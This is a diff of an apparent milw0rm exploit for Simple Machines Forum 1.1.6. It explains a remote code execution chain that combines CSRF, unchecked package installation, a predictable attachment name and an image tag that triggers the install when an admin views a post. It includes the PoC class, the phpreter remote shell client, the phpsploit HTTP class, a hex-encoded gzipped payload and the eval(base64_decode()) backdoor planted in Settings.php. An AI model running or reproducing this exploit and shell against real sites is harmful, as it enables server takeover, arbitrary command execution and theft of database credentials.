-		. "\x19\x19\x93\x8b\x9e\x4e\x83\x31\xd4\x2c\x8b\x9e\xa4\x24"
-		. "\x1d\x8c\x20\x11\x92\x29\x83\x27\x94\x87\x25\xb0\x66\xa7"
-		. "\x24\x0c\x7d\x6f\xed\x72\x6f\x7f\x37\xd8\xbd\x34\x5b\x6c"
-		. "\x58\x66\x52\x52\x55\x7e\xd3\xeb\x76\xce\x3f\x76\xce\x2f"
-		. "\xd7\x0f\x82\xe0\xac\xd7\x3d\xe8\x1c\x1d\xad\x5f\x6d\x6c"
-		. "\xc0\x67\x4c\x36\xe3\x0a\x9c\x5a\xbd\xb1\xe5\x36\xdf\xbe"
-		. "\xb3\xb7\xe9\x2d\x89\xca\x7d\x6c\x22\xb7\xd1\x0b\xe9\x40"
-		. "\x84\xf4\x87\xe2\xdb\x4f\x85\xef\x98\x2a\x6f\x6c\xc3\x97"
-		. "\xab\x2b\xdf\xb3\xb4\x45\xc6\x11\x2b\xe7\x89\x67\x69\xb7"
-		. "\x35\x6a\xe5\x52\x8a\x1b\xaf\x0e\xff\x1f\x17\xcf\x0b\xcc"
-		. "\x7f\x70\xdd\x7a\x36\xff\x1d\xd7\x75\xec\x06\xce\x7f\x67"
-		. "\xab\xb6\x9c\xff\xff\xc6\xfc\x9f\x2f\x90\x05\xe6\xff\xbc"
-		. "\x98\x99\xff\x39\x3d\xbf\x8d\xa8\x39\x35\x8b\x22\xaa\x86"
-		. "\x2d\xff\xbd\x41\x3e\x98\x21\x1f\xdc\x23\x9f\x39\x5b\x08"
-		. "\x24\xd5\x34\xa1\xfe\x3c\x1c\x78\x96\xd9\xfa\x09\x80\xa2"
-		. "\xf6\x6c\xf2\x66\x20\x93\xc3\x12\xf6\xf0\xe1\xfd\x04\x65"
-		. "\x10\x80\x1e\x04\xbd\x5c\x10\x5e\x23\x06\x2d\x69\x49\x4b"
-		. "\x7a\x19\xfa\x0a\x12\x1a\xc6\x57\x00\x10\x00\x00";
-	}
-}
-
-/*
- * Copyright (c) Charles FOL
- *
- * TITLE:          PHPreter
- * AUTHOR:         Charles FOL 
- * VERSION:        1.3
- * LICENSE:        GNU General Public License
- *
- */
-
-class phpreter
-{
-	var $url;
-	var $host;
-	var $port;
-	var $page;
-	
-	var $mode;
-	
-	var $ssql;
-	
-	var $prompt;
-	var $phost;
-	
-	var $expr;
-	var $data;
-	
-	/**
-	 * __construct()
-	 *
-	 * @param url      The url of the remote shell.
-	 * @param expr     The regular expression to catch cmd result.
-	 * @param mode     Mode: php, sql or cmd.
-	 * @param sql      An array with the file to include,
-	 *                 and sql vars
-	 * @param clear    Determines if clear() is called
-	 *                 on startup
-	 */
-	function phpreter($url, $expr='^(.*)$', $mode='cmd', $sql=array(), $clear=false)
-	{
-		$this->url  = $url;
-		$this->expr = '#' . $expr . '#is';
-		
-		#
-		# Set data
-		#
-		
-		$infos         = parse_url($this->url);
-		$this->host    = $infos['host'];
-		$this->port    = isset($infos['port']) ? $infos['port'] : 80;
-		$this->page    = $infos['path'];
-		
-		# www.(site).com
-		$host_tmp      = explode('.', $this->host);
-		$this->phost   = $host_tmp[ count($host_tmp)-2 ];
-		
-		# Set up MySQL connection string
-		$this->set_ssql($sql);
-		
-		# Switch to default mode
-		$this->setmode($mode);
-		
-		#
-		# Main Loop
-		#
-
-		if($clear)
-			$this->clear();
-
-		print $this->prompt;
-
-		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
-		{
-			# change mode
-			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i', $cmd, $array))
-				$this->setmode($array[3]);
-			
-			# clear data
-			elseif(preg_match('#^clear$#i', $cmd))
-				$this->clear();
-			
-			# else
-			else print $this->exec($cmd);
-			
-			print $this->prompt;
-		}
-	}
-	
-	/**
-	 * set_ssql()
-	 * Build $ssql var
-	 */
-	function set_ssql($sql)
-	{
-		$this->ssql = '';
-		
-		$sql = (object) $sql;
-		
-		# is there something to include ?
-		
-		if(isset($sql->include))
-			$this->ssql .= 'include(\'' . $sql->include . '\');';
-			
-		# mysql_connect: host, user, passwd
-			
-		$this->ssql .= 'mysql_connect(';
-		
-		foreach(array('host', 'user', 'passwd') as $key)
-		{
-			if(isset($sql->{'var_' . $key}))
-			{
-				$this->ssql .= $sql->{'var_' . $key} . ',';
-			}
-			else
-			{
-				$this->ssql .= "'" . $sql->{$key} . "',";
-			}
-		}
-		
-		$this->ssql  = substr($this->ssql, 0, -1);
-		$this->ssql .= ');';
-		
-		# mysql_select_db
-		
-		if(isset($sql->var_db))
-			$this->ssql .= 'mysql_select_db(' . $sql->var_db . ');';
-		elseif(isset($sql->db))
-			$this->ssql .= 'mysql_select_db(\'' . $sql->db . '\');';
-			
-		# basic display for mysql results
-		
-		$this->ssql .= '$s=str_repeat(\'-\',50)."\n";';
-		$this->ssql .= '$q=mysql_query(\'\') or print($s.mysql_error()."\n");';
-		$this->ssql .= 'print $s;';
-		$this->ssql .= 'if($q)';
-		$this->ssql .= '{';
-		$this->ssql .=     'while($r=mysql_fetch_array($q,MYSQL_ASSOC))';
-		$this->ssql .=     '{';
-		$this->ssql .=         'foreach($r as $k=>$v) print " ".$k.str_repeat(\' \', 20-strlen($k))."| $v\n";';
-		$this->ssql .=         'print $s;';
-		$this->ssql .=     '}';
-		$this->ssql .= '}';
-	}
-	
-	/**
-	 * clear()
-	 * Clear ouput, printing "\n"x50
-	 */
-	function clear()
-	{
-		print str_repeat("\n", 50);
-		return 0;
-	}
-	
-	/**
-	 * setmode()
-	 * Set mode (PHP, CMD, SQL)
-	 */
-	function setmode($newmode)
-	{
-		$this->mode   = strtolower($newmode);
-		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
-		
-		switch($this->mode)
-		{
-			case 'cmd':
-				$this->data = 'system(\'\');';
-				break;
-			case 'php':
-				$this->data = '';
-				break;
-			case 'sql':
-				$this->data = $this->ssql;
-				break;
-		}
-		
-		return $this->mode;
-	}
-
-	/**
-	 * exec()
-	 * Execute any query and catch the result.
-	 */
-	function exec($cmd)
-	{
-		if($this->data != '')
-			$shell = str_replace('', addslashes($cmd), $this->data);
-		else
-			$shell = $cmd;
-
-		$shell = base64_encode($shell);
-		
-		$packet  = "GET " . $this->page . " HTTP/1.1\r\n";
-		$packet .= "Host: " . $this->host . ( $this->port != 80 ? ':' . $this->port : '' ) . "\r\n";
-		$packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-		$packet .= "Shell: $shell\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		
-		$fp = fsockopen($this->host, $this->port, $errno, $errstr, 30);
-		
-		fputs($fp, $packet);
-		
-		$recv = '';
-		
-		while(!feof($fp))
-			$recv .= fgets($fp, 128);
-		
-		fclose($fp);
-		
-		# Remove headers
-		$data    = explode("\r\n\r\n", $recv);
-		$headers = array_shift($data);
-		$content = implode("\r\n\r\n", $data);
-		
-		# Unchunk content
-		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
-			$content = $this->unchunk($content);
-		
-		# Find results
-		preg_match($this->expr, $content, $match);
-		
-		$match = $match[1];
-		
-		# Add a \n if there is not
-		if(substr($match, -1) != "\n")
-			$match .= "\n";
-		
-		return $match;
-	}
-	
-	/**
-	 * unchunk()
-	 * Remove chunked content's sizes which are put by the apache
-	 * server when it uses chunked transfert-encoding.
-	 */
-	function unchunk($data)
-	{
-		$dsize  = 1;
-		$offset = 0;
-		
-		while($dsize>0)
-		{
-			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
-			
-			$dsize = hexdec(substr($data, $offset, $hsize_size));
-			
-			# Remove $hsize\r\n from $data
-			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
-			
-			$offset += $dsize;
-			
-			# Remove the \r\n before the next $hsize
-			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
-		}
-		
-		return $data;
-	}
-}
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.0
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-		
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-	
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket,$this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @example $this->showheader()
-	 * 
-	 */
-	function showheader()
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @example $this->showcookie()
-	 * 
-	 */
-	function showcookie()
-	{
-		$this->cookie_str = '';
-		
-		if(!isset($this->cookie))
-		   return;
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->url('localhost/index.php?var=x')
-	 * @example $this->url('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => ''));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->url('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$iserver_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		   
-		$urlarr     = parse_url($urltarg);
-		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		if(!isset($urlarr['path']) or empty($urlarr['path']))
-		   die("Error: No path precised");
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->url('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->url($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->url('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->url($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array();
-			break;
-				
-			case 'cookie':
-			$this->cookie = array();
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array();
-			$this->cookie = array();
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-?>
-
-# milw0rm.com [2008-11-04]
+
+#   URL: http://real.olympe-network.com/
+#
+# Note: other versions are maybe vulnerable, not tested.
+#
+# SMF suffers from multiples vulnerabilities.
+# Combining some of them, we can obtain a remote code execution on the
+# remote host. I won't talk here about all of them, but I'll explain
+# how we can execute code.
+#
+# 0 - UPDATE (05/11/08)
+#
+# (Now,) SMF seems to replace "action=" by "action-" in every URL.
+# But SMF urldecode() GET data, so I replaced "action" by "%61ction".
+# Other little problems have been corrected.
+#
+# Thanks to Alessandro Tagliapietra for his report and his patience.
+#
+# It seems that many people can't use phpreter, so here is a little course :
+#
+# phpreter have 3 modes : cmd (bash), php, and SQL
+#
+# To switch to a mode just type "mode=" (replace  by php, cmd or sql)
+#
+# In cmd mode, you can run bash commands, like "ls"
+# In php mode, you can exec php code like "echo 'abc';"
+# In sql mode, you can exec sql queries and view results, try "SHOW TABLES"
+#
+# I - Session Code
+#
+# SMF administration panel is secured by a "session code", a kind of
+# password that must be provided by the admin browser when the admin
+# is editing data.
+#
+# But the session code is not required for SMF package installation.
+# Just to be clear : you don't need the "session code" to install the
+# package, but you do need a valid admin session.
+#
+# II - Package Installation
+#
+# Package installation works this way :
+# - The admin tells an archive file, which can be either gzip or zip, to SMF
+# - SMF un(g)zip it, and analyse the XML files (yes, it work with XML)
+#   to add, replace or remove code from any SMF source code file.
+#
+# To precise an archive to SMF, the admin is supposed to go on this URL :
+# 
+# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1)
+#
+# Since $_REQUEST['package'] is not checked, we can install any file
+# on the server, even if the file is not in the Packages/ dir.
+#
+# Using CSRF, we can make an admin to install whatever package we want.
+# That does not seem really interesting for now, but be patient =)
+#
+# III - File upload in SMF; Attachments
+#
+# SMF let users upload files in two cases :
+# - You can upload an image to be your avatar
+# - You can upload attachments to every post you submit
+#
+# Since uploaded images are checked, they don't interest us for now.
+# 
+# Attachments are not checked by SMF.
+# They are renamed and moved to the attachments/ directory.
+# They are renamed this way :
+# [id]_[name]_[ext][md5([name].[ext])]
+#
+# As you can see, there is no rand(), or other strange stuff :
+# we can easily find attachment name.
+#
+# The second part is more interesting now, no ?
+#
+# Now, we can submit a post with a gzip'ed attachment, and make the admin
+# click on a specific link, to install a package we uploaded ourself.
+#
+# I writed "click", so many of you may say "brr, that sucks".
+# So here come the wait-I've-not-finished part.
+#
+# IV - Wait-I've-not-finished part
+#
+# SMF allows us to display remote images in our posts, using [img][/img]
+# We can just set our image URL to ... (1) : when the admin will see our post,
+# the package will be installed.
+#
+# V - Classic Scenario
+#
+# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready
+#    to be installed.
+# 2. We guess the attachment name, that's pretty easy because we can retrieve the
+#    attachment ID.
+# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by 
+#    ../attachments/[the_name_you_just_found]
+# 4. The administrator discover our fantastic post on his fantastic forum ...
+# 5. His browser discovers our image : it goes to the specified url to download it.
+#    wooops. The package is installed.
+#
+# VI - Exploit
+#
+# The exploit will login with your user account, and submit a new post/topic containing an
+# attachment, a gzipped package, which permits remote code execution once installed.
+# Then it will obtain the attachment ID, determine attachment name, and modify your topic to
+# add a remote image (using [img][/img]).
+# Then you'll have to wait for an admin to see your post ... and the package will be installed.
+#
+# VII - Notes
+#
+# - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic.
+# - The current gzipped package is supposed to put PHP code at the end of Settings.php file.
+# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
+#
+# First run the exploit like this :
+# eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd
+# And when you think the admin viewed your post, run the shell :)
+# eg : php exploit.php -url http://localhost/forum/ -shell
+#
+# FOR EDUCATIONAL PURPOSE ONLY
+#
+
+new smf_poc();
+
+class smf_poc
+{
+	const SUBJECT = 'hello';
+	const MESSAGE = 'dudes ... I love your forum ;)';
+	
+	function smf_poc()
+	{
+		$this->header();
+		$this->gzip();
+		$this->loadparameters();
+		$this->wwwinit();
+		
+		if(!$this->shell)
+		{
+			# First of all, login
+			$this->login();
+			# Then submit a topic
+			$this->submit_post();
+			# Find attachment name and message id
+			$this->get_postinfo();
+			# and modify the post
+			$this->edit_post();
+			# finally ... wait.
+			$this->wait();
+		}
+		else
+			$this->shell();
+	}
+	
+	function header()
+	{
+		$this->msg();
+		$this->msg('  Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit');
+		$this->msg('    by Charles FOL ');
+		$this->msg();
+	}
+	
+	function msg($msg = '', $exit = 0)
+	{
+		print '# ' . $msg . "\n";
+		
+		if($exit)
+		{
+			$this->msg();
+			exit();
+		}
+	}
+	
+	function usage()
+	{
+		global $argv;
+		
+		$name = basename($argv[0]);
+		
+		$this->msg('usage : php ' . $name . ' -url [url] -bid [bid] -user [user]:[passwd]');
+		$this->msg('   OR   php ' . $name . ' -url [url] -shell');
+		$this->msg();
+		$this->msg('Parameters are :');
+		$this->msg(' -shell            Test if the shell is installed, and load phpreter');
+		$this->msg(' -bid (int)        The board ID were you want to submit the topic');
+		$this->msg(' -user user:passwd A valid user:password couple');
+		$this->msg(' -wait             Flood control time (default: 5)');
+		$this->msg();
+		$this->msg('eg : php ' . $name . ' -url http://localhost/forum/ -bid 2 -user tester:passwd', 1);
+	}
+	
+	# Get every needed parameters, and load defaults
+	function loadparameters()
+	{
+		$this->furl  = $this->getparameter('url');
+		$this->shell = $this->getoption('shell');
+		$this->wait  = $this->getparameter('wait', 5);
+		
+		if(!$this->shell)
+		{
+			$this->bid  = $this->getparameter('bid');
+			$this->user = $this->getparameter('user');
+		}
+	}
+	
+	# Patience ...
+	function wait()
+	{
+		$this->url->topic = $this->pid;
+		$this->makeurl();
+		
+		$this->msg();
+		$this->msg('Now, you just have to wait for an admin to see your post,');
+		$this->msg('then you will be able to launch a shell using -shell.');
+		$this->msg();
+		$this->msg('Post URL : ' . $this->murl, 1);
+	}
+	
+	# Check if a shell is available and launch phpreter
+	function shell()
+	{
+		$this->www->addheader('Shell', 'MTs=');
+		
+		$this->url->action = 'forum';
+		$this->get();
+		
+		if(!$this->match('(12345678901234567890)'))
+			$this->msg('Shell is not available', -1);
+		
+		$sql = array
+		(
+			'var_host'   => '$db_server',
+			'var_user'   => '$db_user',
+			'var_passwd' => '$db_passwd',
+			'var_db'     => '$db_name'
+		);
+		
+		$preter = new phpreter($this->murl, '1234567890(.*)1234567890', 'cmd', $sql);
+	}
+	
+	function wwwinit()
+	{
+		$this->www = new phpsploit();
+		$this->www->cookiejar(1);
